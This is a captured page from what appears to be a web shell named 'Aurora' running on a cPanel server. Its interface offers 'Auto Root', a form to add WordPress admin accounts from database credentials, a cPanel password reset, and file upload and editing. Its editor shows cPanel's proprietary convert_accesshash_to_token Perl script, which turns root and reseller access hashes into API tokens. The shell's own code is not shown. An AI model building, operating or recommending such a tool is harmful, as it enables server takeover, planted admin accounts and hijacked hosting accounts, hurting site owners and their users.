Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
scripts
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: convert_accesshash_to_token
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/convert_accesshash_to_token Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited use strict; use warnings; use File::Basename (); use Getopt::Long (); use Cpanel::Rand::Get (); use Cpanel::ResellerFunctions (); use Cpanel::SafeFile (); use Cpanel::ConfigFiles (); use Cpanel::Security::Authn::APITokens::Write::whostmgr (); use Whostmgr::AccessHash (); use Digest::SHA (); exit _main(@ARGV) unless caller; sub _main { my @args = @_; unless ( $> == 0 && $< == 0 ) { return bail_out('error: This program can only be run by root!'); } Getopt::Long::GetOptionsFromArray( \@args, 'help|?' => \my $print_help, 'verbose' => \my $verbose, 'all-resellers' => \my $all_resellers, ) || return bail_out('Invalid usage. See --help'); return print_help() if $print_help; $ENV{'REMOTE_USER'} = 'root'; my @users = @args; @users = Cpanel::ResellerFunctions::getresellerslist() if $all_resellers; @users = ( $ENV{'REMOTE_USER'} ) if !@users; foreach my $user (@users) { my $details = eval { import_accesshash($user) }; if ($@) { next if $@ =~ m/^No accesshash exists for/; print STDERR "error: $user: $@"; } elsif ($verbose) { print "Imported accesshash for “$user” as “$details->{name}”\n"; } } return 0; } sub _update_accounting_log { my ( $action, $token_name ) = @_; my $acctlog = Cpanel::SafeFile::safeopen( my $accounting_log_fh, '>>', $Cpanel::ConfigFiles::ACCOUNTING_LOG_FILE ); if ( !$acctlog ) { logger->warn("Could not write to /var/cpanel/accounting.log"); } else { chmod 0600, $Cpanel::ConfigFiles::ACCOUNTING_LOG_FILE; # The accounting log format is: # <time>:<action keyword>:<remote user>:<user>:<domain>:<other items particular to the action> # We are using "not-applicable" for the domain since it isn't really necessary here. print $accounting_log_fh localtime() . ":$action:$ENV{'REMOTE_USER'}:$ENV{'REMOTE_USER'}:not-applicable:$token_name\n"; Cpanel::SafeFile::safeclose( $accounting_log_fh, $acctlog ); } return 1; } sub import_accesshash { my ($user) = @_; my ( $status, $msg, $accesshash ) = Whostmgr::AccessHash::get_access_hash($user); die "$msg\n" if !$status; $accesshash =~ s/\s//g; my $token_hash = Digest::SHA::sha512_hex($accesshash); my $data_obj = Cpanel::Security::Authn::APITokens::Write::whostmgr->new( { user => $user } ); my $count = 0; my $suffix = ''; my $basename = "accesshash-" . time; my $token_details; while ( !$token_details ) { die "Cannot import accesshash: $@" if ++$count > 25; $token_details = eval { $data_obj->import_token_hash( { name => "$basename$suffix", token_hash => $token_hash, } ); }; # TODO: Why no error report here? $suffix = "-" . Cpanel::Rand::Get::getranddata( 8, [ 0 .. 9, 'A' .. 'Z' ] ); } $data_obj->save_changes_to_disk(); _update_accounting_log( "CREATEAPITOKEN", "$basename$suffix" ); return $token_details; } sub print_help { my $basename = File::Basename::basename($0); print <<HELP; Usage: $basename [OPTIONS] [reseller ...] Options: -?, --help Display this message --verbose Print all of the tokens generated --all-resellers Process all reseller users HELP return 0; } sub bail_out { my $error_msg = shift; print STDERR $error_msg . "\n\n" if $error_msg; print_help(); return 1; }